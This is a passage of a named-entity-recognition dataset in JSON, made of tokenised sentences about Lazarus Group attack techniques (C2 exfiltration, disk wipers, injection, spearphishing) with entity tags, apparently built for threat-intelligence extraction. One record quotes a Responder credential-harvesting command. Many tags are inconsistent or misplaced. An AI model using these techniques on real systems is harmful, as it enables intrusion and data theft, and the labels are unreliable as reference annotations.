"O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "compressed", "exfiltrated", "data", "with", "RAR", "and", "used", "RomeoDelta", "malware", "to", "archive", "specified", "directories", "in", ".zip", "format,", "encrypt", "the", ".zip", "file,", "and", "upload", "it", "to", "C2." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "Lazarus", "Group", "malware", "sample", "encrypts", "data", "using", "a", "simple", "byte", "based", "XOR", "operation", "prior", "to", "exfiltration." ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "malware", "IndiaIndia", "saves", "information", "gathered", "about", "the", "victim", "to", "a", "file", "that", "is", "compressed", "with", "Zlib,", "encrypted,", "and", "uploaded", "to", "a", "C2", "server." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "used", "GitHub", "as", "C2,", "pulling", "hosted", "image", "payloads", "then", "committing", "command", "execution", "output", "to", "files", "in", "specific", "directories." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "malware", "WhiskeyAlfa-Three", "modifies", "sector", "0", "of", "the", "Master", "Boot", "Record", "(MBR)", "to", "ensure", "that", "the", "malware", "will", "persist", "even", "if", "a", "victim", "machine", "shuts", "down." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "routinely", "deleted", "log", "files", "on", "a", "compromised", "router,", "including", "automatic", "log", "deletion", "through", "the", "use", "of", "the", "logrotate", "utility." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-OffAct", "B-Way", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "digitally", "signed", "malware", "and", "utilities", "to", "evade", "detection." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "keylogger", "KiloAlfa", "obtains", "user", "tokens", "from", "interactive", "sessions", "to", "execute", "itself", "with", "API", "call", "<code>CreateProcessAsUserA</code>", "under", "that", "user's", "context." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "replaced", "`win_fw.dll`,", "an", "internal", "component", "that", "is", "executed", "during", "IDA", "Pro", "installation,", "with", "a", "malicious", "DLL", "to", "download", "and", "execute", "a", "payload." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "used", "a", "custom", "secure", "delete", "function", "to", "overwrite", "file", "contents", "with", "data", "from", "heap", "memory." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "I-Tool", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "collected", "data", "and", "files", "from", "compromised", "networks." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "used", "shellcode", "within", "macros", "to", "decrypt", "and", "manually", "map", "DLLs", "and", "shellcode", "into", "memory", "at", "runtime." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "obtained", "SSL", "certificates", "for", "their", "C2", "domains." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "Various", "Lazarus", "Group", "malware", "modifies", "the", "Windows", "firewall", "to", "allow", "incoming", "connections", "or", "disable", "it", "entirely", "using", "netsh." ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "malware", "TangoDelta", "attempts", "to", "terminate", "various", "processes", "associated", "with", "McAfee.", "Additionally,", "Lazarus", "Group", "malware", "SHARPKNOT", "disables", "the", "Microsoft", "Windows", "System", "Event", "Notification", "and", "Alerter", "services.." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "used", "malware", "like", "WhiskeyAlfa", "to", "overwrite", "the", "first", "64MB", "of", "every", "drive", "with", "a", "mix", "of", "static", "and", "random", "buffers.", "A", "similar", "process", "is", "then", "used", "to", "wipe", "content", "in", "logical", "drives", "and,", "finally,", "attempt", "to", "wipe", "every", "byte", "of", "every", "sector", "on", "every", "drive.", "WhiskeyBravo", "can", "be", "used", "to", "overwrite", "the", "first", "4.9MB", "of", "physical", "drives.", "WhiskeyDelta", "can", "overwrite", "the", "first", "132MB", "or", "1.5MB", "of", "each", "drive", "with", "random", "data", "from", "heap", "memory." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "malware", "SHARPKNOT", "overwrites", "and", "deletes", "the", "Master", "Boot", "Record", "(MBR)", "on", "the", "victim's", "machine", "and", "has", "possessed", "MBR", "wiper", "malware", "since", "at", "least", "2009." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Time" ] }, { "tokens": [ "Lazarus", "Group", "has", "acquired", "domains", "related", "to", "their", "campaigns", "to", "act", "as", "distribution", "points", "and", "C2", "channels." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "delivered", "RATANKBA", "and", "other", "malicious", "code", "to", "victims", "via", "a", "compromised", "legitimate", "website." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "used", "a", "custom", "hashing", "method", "to", "resolve", "APIs", "used", "in", "shellcode." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "Lazarus", "Group", "malware", "sample", "performs", "reflective", "DLL", "injection." ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "I-Way", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "created", "new", "email", "accounts", "for", "spearphishing", "operations." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Lazarus", "Group", "collected", "email", "addresses", "belonging", "to", "various", "departments", "of", "a", "targeted", "organization", "which", "were", "used", "in", "follow-on", "phishing", "campaigns." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "Lazarus", "Group", "has", "used", "multiple", "types", "of", "encryption", "and", "encoding", "for", "their", "payloads,", "including", "AES,", "Caracachs,", "RC4,", "XOR,", "Base64,", "and", "other", "tricks", "such", "as", "creating", "aliases", "in", "code", "for", "Native", "API", "function", "names." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "O", "O", "O", "O", "O", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "exfiltrated", "data", "and", "files", "over", "a", "C2", "channel", "through", "its", "various", "tools", "and", "malware." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "malware", "SierraBravo-Two", "generates", "an", "email", "message", "via", "SMTP", "containing", "information", "about", "newly", "infected", "victims." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "exploited", "Adobe", "Flash", "vulnerability", "CVE-2018-4878", "for", "execution." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "I-Exp", "I-Exp", "I-Exp", "B-Features", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "used", "multiple", "proxies", "to", "obfuscate", "network", "traffic", "from", "victims." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "B-Purp", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "malware", "SierraAlfa", "sends", "data", "to", "one", "of", "the", "hard-coded", "C2", "servers", "chosen", "at", "random,", "and", "if", "the", "transmission", "fails,", "chooses", "a", "new", "C2", "server", "to", "attempt", "the", "transmission", "again." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "malware", "has", "deleted", "files", "in", "various", "ways,", "including", "\"suicide", "scripts\"", "to", "delete", "malware", "binaries", "from", "the", "victim.", "Lazarus", "Group", "also", "uses", "secure", "file", "deletion", "to", "delete", "files", "from", "the", "victim." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "malware", "can", "use", "a", "common", "function", "to", "identify", "target", "files", "by", "their", "extension,", "and", "some", "also", "enumerate", "files", "and", "directories,", "including", "a", "Destover-like", "variant", "that", "lists", "files", "and", "gathers", "information", "for", "all", "drives." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "studied", "publicly", "available", "information", "about", "a", "targeted", "organization", "to", "tailor", "spearphishing", "efforts", "against", "specific", "departments", "and/or", "individuals." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "used", "a", "VBA", "Macro", "to", "set", "its", "file", "attributes", "to", "System", "and", "Hidden", "and", "has", "named", "files", "with", "a", "dot", "prefix", "to", "hide", "them", "from", "the", "Finder", "application." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "restored", "malicious", "KernelCallbackTable", "code", "to", "its", "original", "state", "after", "the", "process", "execution", "flow", "has", "been", "hijacked." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "persistence", "mechanisms", "have", "used", "<code>forfiles.exe</code>", "to", "execute", ".htm", "files." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "downloaded", "files,", "malware,", "and", "tools", "from", "its", "C2", "onto", "a", "compromised", "host." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "replaced", "the", "background", "wallpaper", "of", "systems", "with", "a", "threatening", "image", "after", "rendering", "the", "system", "unbootable", "with", "a", "Disk", "Structure", "Wipe." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "used", "a", "compromised", "router", "to", "serve", "as", "a", "proxy", "between", "a", "victim", "network's", "corporate", "and", "restricted", "segments." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "abused", "the", "<code>KernelCallbackTable</code>", "to", "hijack", "process", "control", "flow", "and", "execute", "shellcode." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "malware", "KiloAlfa", "contains", "keylogging", "functionality." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "executed", "Responder", "using", "the", "command", "<code>[Responder", "file", "path]", "-i", "[IP", "address]", "-rPv</code>", "on", "a", "compromised", "host", "to", "harvest", "credentials", "and", "move", "laterally." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "malware", "IndiaIndia", "saves", "information", "gathered", "about", "the", "victim", "to", "a", "file", "that", "is", "saved", "in", "the", "%TEMP%", "directory,", "then", "compressed,", "encrypted,", "and", "uploaded", "to", "a", "C2", "server." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "attempted", "to", "get", "users", "to", "launch", "a", "malicious", "Microsoft", "Word", "attachment", "delivered", "via", "a", "spearphishing", "email." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "I-SamFile", "I-SamFile", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "developed", "custom", "malware", "for", "use", "in", "their", "operations." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "used", "a", "scheduled", "task", "named", "`SRCheck`", "to", "mask", "the", "execution", "of", "a", "malicious", ".dll." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "Lazarus", "Group", "has", "renamed", "malicious", "code", "to", "disguise", "it", "as", "Microsoft's", "narrator", "and", "other", "legitimate", "files." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "used", "<code>mshta.exe</code>", "to", "execute", "HTML", "pages", "downloaded", "by", "initial", "access", "documents." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "used", "multi-stage", "malware", "components", "that", "inject", "later", "stages", "into", "separate", "processes." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "used", "the", "Windows", "API", "<code>ObtainUserAgentString</code>", "to", "obtain", "the", "User-Agent", "from", "a", "compromised", "host", "to", "connect", "to", "a", "C2", "server.", "Lazarus", "Group", "has", "also", "used", "various,", "often", "lesser", "known,", "functions", "to", "perform", "various", "types", "of", "Discovery", "and", "Process", "Injection." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "B-Tool", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "used", "nmap", "from", "a", "router", "VM", "to", "scan", "ports", "on", "systems", "within", "the", "restricted", "segment", "of", "an", "enterprise", "network." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Some", "Lazarus", "Group", "malware", "uses", "a", "list", "of", "ordered", "port", "numbers", "to", "choose", "a", "port", "for", "C2", "traffic,", "creating", "port-protocol", "mismatches." ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "malware", "attempts", "to", "connect", "to", "Windows", "shares", "for", "lateral", "movement", "by", "using", "a", "generated", "list", "of", "usernames,", "which", "center", "around", "permutations", "of", "the", "username", "Administrator,", "and", "weak", "passwords." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "used", "PowerShell", "to", "execute", "commands", "and", "malicious", "code." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Several", "Lazarus", "Group", "malware", "families", "gather", "a", "list", "of", "running", "processes", "on", "a", "victim", "system", "and", "send", "it", "to", "their", "C2", "server.", "A", "Destover-like", "variant", "used", "by", "Lazarus", "Group", "also", "gathers", "process", "times." ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "malware", "also", "uses", "a", "unique", "form", "of", "communication", "encryption", "known", "as", "FakeTLS", "that", "mimics", "TLS", "but", "uses", "a", "different", "encryption", "method,", "potentially", "evading", "SSL", "traffic", "inspection/decryption." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "malware", "IndiaIndia", "checks", "Registry", "keys", "within", "HKCU", "and", "HKLM", "to", "determine", "if", "certain", "applications", "are", "present,", "including", "SecureCRT,", "Terminal", "Services,", "RealVNC,", "TightVNC,", "UltraVNC,", "Radmin,", "mRemote,", "TeamViewer,", "FileZilla,", "pcAnyware,", "and", "Remote", "Desktop.", "Another", "Lazarus", "Group", "malware", "sample", "checks", "for", "the", "presence", "of", "the", "following", "Registry", "key:<code>HKEY_CURRENT_USER\\Software\\Bitcoin\\Bitcoin-Qt</code>." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "B-Idus", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "O", "B-Way", "B-Tool", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Lazarus", "Group", "has", "changed", "memory", "protection", "permissions", "then", "overwritten", "in", "memory", "DLL", "function", "code", "with", "shellcode,", "which", "was", "later", "executed", "via", "KernelCallbackTable", "hijacking.", "Lazarus", "Group", "has", "also", "used", "shellcode", "within", "macros", "to", "decrypt", "and", "manually", "map", "DLLs", "into", "memory", "at", "runtime." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "maintained", "persistence", "by", "loading", "malicious", "code", "into", "a", "startup", "folder", "or", "by", "adding", "a", "Registry", "Run", "key." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "I-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Tool", "B-Tool", "B-Way" ] }, { "tokens": [ "Lazarus", "Group", "malware", "SierraCharlie", "uses", "RDP", "for", "propagation." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "renamed", "system", "utilities", "such", "as", "<code>wscript.exe</code>", "and", "<code>mshta.exe</code>." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "Lazarus", "Group", "has", "used", "rundll32", "to", "execute", "malicious", "payloads", "on", "a", "compromised", "host." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "malware", "SierraAlfa", "accesses", "the", "<code>ADMIN$</code>", "share", "via", "SMB", "to", "conduct", "lateral", "movement." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "used", "SSH", "and", "the", "PuTTy", "PSCP", "utility", "to", "gain", "access", "to", "a", "restricted", "segment", "of", "a", "compromised", "network." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "B-Way", "B-Tool", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "used", "<code>schtasks</code>", "for", "persistence", "including", "through", "the", "periodic", "execution", "of", "a", "remote", "XSL", "script", "or", "a", "dropped", "VBS", "payload." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "compromised", "servers", "to", "stage", "malicious", "tools." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "stopped", "the", "MSExchangeIS", "service", "to", "render", "Exchange", "contents", "inaccessible", "to", "users." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "malware", "has", "maintained", "persistence", "on", "a", "system", "by", "creating", "a", "LNK", "shortcut", "in", "the", "user’s", "Startup", "folder." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "created", "new", "Twitter", "accounts", "to", "conduct", "social", "engineering", "against", "potential", "victims." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Org", "O", "O", "O", "I-Idus", "I-Idus", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "targeted", "victims", "with", "spearphishing", "emails", "containing", "malicious", "Microsoft", "Word", "documents." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "I-SamFile", "I-SamFile", "O" ] }, { "tokens": [ "Lazarus", "Group", "has", "sent", "malicious", "links", "to", "victims", "via", "email." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Lazarus", "Group", "has", "used", "social", "media", "platforms,", "including", "LinkedIn", "and", "Twitter,", "to", "send", "spearphishing", "messages." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "I-Idus", "I-Idus", "O", "O", "O", "O", "B-Org", "O", "O", "B-Way", "O" ] }, { "tokens": [ "A", "Lazarus", "Group", "malware", "sample", "encodes", "data", "with", "base64." ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Several", "Lazarus", "Group", "malware", "families", "encrypt", "C2", "traffic", "using", "custom", "code", "that", "uses", "XOR", "with", "an", "ADD", "operation", "and", "XOR", "with", "a", "SUB", "operation.", "Another", "Lazarus", "Group", "malware", "sample", "XORs", "C2", "traffic.", "Other", "Lazarus", "Group", "malware", "uses", "Caracachs", "encryption", "to", "encrypt", "C2", "payloads.", "Lazarus", "Group", "has", "also", "used", "AES", "to", "encrypt", "C2", "traffic." ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "lnk", "files", "used", "for", "persistence", "have", "abused", "the", "Windows", "Update", "Client", "(<code>wuauclt.exe</code>)", "to", "execute", "a", "malicious", "DLL." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-Way", "B-Way" ] }, { "tokens": [ "Several", "Lazarus", "Group", "malware", "families", "collect", "information", "on", "the", "type", "and", "version", "of", "the", "victim", "OS,", "as", "well", "as", "the", "victim", "computer", "name", "and", "CPU", "information.", "A", "Destover-like", "variant", "used", "by", "Lazarus", "Group", "also", "collects", "disk", "space", "information", "and", "sends", "it", "to", "its", "C2", "server." ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "B-Purp", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "malware", "IndiaIndia", "obtains", "and", "sends", "to", "its", "C2", "server", "information", "about", "the", "first", "network", "interface", "card’s", "configuration,", "including", "IP", "address,", "gateways,", "subnet", "mask,", "DHCP", "information,", "and", "whether", "WINS", "is", "available." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", 